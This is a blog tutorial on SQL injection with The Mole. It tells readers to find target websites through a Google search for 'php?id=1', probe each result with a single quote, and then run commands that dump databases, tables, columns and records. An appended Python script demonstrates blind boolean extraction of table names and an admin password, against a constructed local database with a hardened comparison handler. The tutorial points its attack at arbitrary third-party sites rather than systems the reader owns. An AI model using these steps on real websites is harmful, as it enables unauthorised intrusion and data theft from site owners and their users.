
SQL Injection – How to hack a website's SQL tables using the Mole

30/12/2015

To test that websites are safe from SQL injection we can use SQLMAP or The Mole.  Here we show the syntax for using The Mole in SQL injection testing.

Step 1 – Download Python 3 for Windows or Kali Linux

https://www.python.org/downloads/windows

Step 2 – Download the Mole

http://sourceforge.net/projects/themole/?source=typ_redirect

Step 3 – Install and launch the Mole

Install to C:\mole, then open a command prompt in the extracted folder:

cd themole-0.3-win32

dir    – check that you can see mole.exe.

mole

(screenshot: the Mole prompt after launch)

The remaining steps are typed at the Mole prompt; the attack commands start at step 5.

Step 4 – Find a vulnerable website

Use Google.  Search for the term

php?id=1

This returns pages that take a numeric id parameter in the URL.  Browse to a site from the results and add a single quote (apostrophe) to the end of the URL, so that it reads

php?id=1'

If the page comes back with a database error (for example a MySQL syntax error), the quote has reached the SQL query unescaped and the parameter is a candidate for injection.  Check each site returned by Google the same way.  A quieter confirmation is to compare php?id=1 AND 1=1 (page unchanged) with php?id=1 AND 1=2 (record missing from the page): an error on its own can come from input validation rather than from SQL, and no error does not mean the parameter is safe, because many sites hide database errors.

*****

Step 5 – Attack Syntax to get the Website Databases

At the Mole prompt, point it at the injectable URL and give it a needle:

url http://www.website.com/page.php?id=1

needle xxxx

(xxxx = a word that appears on the page when the query returns a real record, e.g. part of the article text; page.php stands for whatever script the site actually uses.)

schemas

Caution regarding needle.  The Mole uses the needle to tell a "true" response from a "false" one, so it must be text that is present when id=1 returns its record and absent when the injected condition fails.  If you use a term not found on the page at all, you'll get an error.  Here we used the term "home", eg needle home

(screenshot: needle error)

Now you'll see the databases on the site appear.  Write down the names of the databases, as we'll use these where dbname appears in our syntax.

(screenshot: output of schemas)

Every MySQL server has an information_schema database, which holds metadata about all the other databases, so we can use information_schema where dbname is needed for the rest of the walkthrough; the site's own data lives in the other databases listed.

*****

Step 6 – Attack Syntax to get the Tables

tables dbname

for example

tables information_schema

(screenshot: output of tables)

The output lists the tables inside the information_schema database (40 of them on this server).  information_schema is a database, not a table, and each entry listed is a table you can look into with the next step.

****

Step 7 – Attack Syntax to get the Columns

columns dbname tablename

for example

columns information_schema tableabc

(tableabc = one of the table names returned by the tables command, e.g. TABLES.)

****

Step 8 – Attack Syntax to get the records from the tables

query dbname tablename col1,col2,col3

(col1,col2,col3 = the column names from step 7, separated by commas.)
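Steps 4 to 8 are what The Mole automates.  As an added example (not from this post and not The Mole's own code), the following Python script builds a small in-memory SQLite database with a deliberately injectable page.php?id= style handler beside a hardened one, then performs the single-quote probe of step 4, the needle check of step 5, and the blind boolean extraction that sits behind the schemas/tables/query commands of steps 6 to 8.  Everything in it is constructed: the article and user rows, the table names and the admin password.  SQLite's sqlite_master catalogue stands in for MySQL's information_schema, and the needle/condition strings show the general boolean-blind technique rather than The Mole's exact requests.

```python
import sqlite3

# Constructed sample data standing in for a target site's database (nothing here is real).
SAMPLE_ARTICLES = [
    (1, "Home", "Welcome to our site"),
    (2, "Contact", "Write to us using the form"),
]
SAMPLE_USERS = [(1, "admin", "s3cret")]


def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE articles (id INTEGER PRIMARY KEY, title TEXT, body TEXT)")
    conn.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, password TEXT)")
    conn.executemany("INSERT INTO articles VALUES (?, ?, ?)", SAMPLE_ARTICLES)
    conn.executemany("INSERT INTO users VALUES (?, ?, ?)", SAMPLE_USERS)
    return conn


CONN = make_db()


def vulnerable_page(id_param):
    """page.php?id=<id_param> written the injectable way: the parameter is pasted into the SQL."""
    sql = "SELECT title, body FROM articles WHERE id = " + id_param
    try:
        row = CONN.execute(sql).fetchone()
    except sqlite3.Error as exc:          # the site shows raw database errors (step 4 relies on this)
        return "<h1>Database error</h1><p>%s</p>" % exc
    if row is None:
        return "<h1>Not found</h1>"
    return "<h1>%s</h1><p>%s</p>" % row


def hardened_page(id_param):
    """Same page, fixed: the id is validated as an integer and bound as a query parameter."""
    try:
        article_id = int(id_param)
    except ValueError:
        return "<h1>Bad request</h1>"
    row = CONN.execute("SELECT title, body FROM articles WHERE id = ?", (article_id,)).fetchone()
    if row is None:
        return "<h1>Not found</h1>"
    return "<h1>%s</h1><p>%s</p>" % row


def error_probe(page):
    """Step 4: append a single quote to the id and look for a database error."""
    return "Database error" in page("1'")


def oracle(page, condition, needle):
    """One boolean-blind request: id=1 AND (condition).  True if the needle is still on the page."""
    return needle in page("1 AND (%s)" % condition)


def needle_is_usable(page, needle):
    """The needle must show up on a TRUE page and vanish on a FALSE page, or the oracle is blind."""
    return oracle(page, "1=1", needle) and not oracle(page, "1=2", needle)


def extract_string(page, subquery, needle, max_len=64):
    """Recover the single string returned by `subquery` using only yes/no answers:
    binary search on its length, then on the code point of each character."""
    lo, hi = 0, max_len
    while lo < hi:                        # length = smallest n for which NOT (length > n)
        mid = (lo + hi) // 2
        if oracle(page, "length((%s)) > %d" % (subquery, mid), needle):
            lo = mid + 1
        else:
            hi = mid
    length = lo
    chars = []
    for pos in range(1, length + 1):      # one character at a time, 7 requests each
        lo, hi = 0, 127
        while lo < hi:
            mid = (lo + hi) // 2
            if oracle(page, "unicode(substr((%s), %d, 1)) > %d" % (subquery, pos, mid), needle):
                lo = mid + 1
            else:
                hi = mid
        chars.append(chr(lo))
    return "".join(chars)


def enumerate_tables(page, needle):
    """Steps 5/6 in miniature: read table names out of the catalogue one at a time.
    sqlite_master stands in for MySQL's information_schema.tables (assumption of this example)."""
    tables = []
    while True:
        sub = ("SELECT name FROM sqlite_master WHERE type='table' "
               "ORDER BY name LIMIT 1 OFFSET %d" % len(tables))
        name = extract_string(page, sub, needle)
        if not name:                      # past the last table the subquery returns NULL
            return tables
        tables.append(name)


if __name__ == "__main__":
    for label, page in (("vulnerable", vulnerable_page), ("hardened", hardened_page)):
        print(label, "quote probe shows DB error:", error_probe(page))
        print(label, "needle 'Welcome' usable:", needle_is_usable(page, "Welcome"))
        print(label, "tables found:", enumerate_tables(page, "Welcome"))
    print("step 8 equivalent, admin password:",
          extract_string(vulnerable_page, "SELECT password FROM users WHERE username='admin'", "Welcome"))
```

Against the vulnerable handler the quote probe reports a database error, "Welcome" works as a needle (it is on the TRUE page and gone from the FALSE page, whereas "<h1>" is on both and is rejected), the two table names come back one character at a time, and the constructed admin password is read out of the users table.  Against the hardened handler every probe returns "Bad request" with no needle, so the same code finds nothing.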

****

For testing websites, would I recommend Mole or SQLMAP?  For ease of use it has to be SQLMAP.

****

SQLMAP – How to hack a Website’s SQL tables on Windows

https://uwnthesis.wordpress.com/2015/12/29/sqlmap-how-to-hack-a-websites-sql-tables-on-windows/
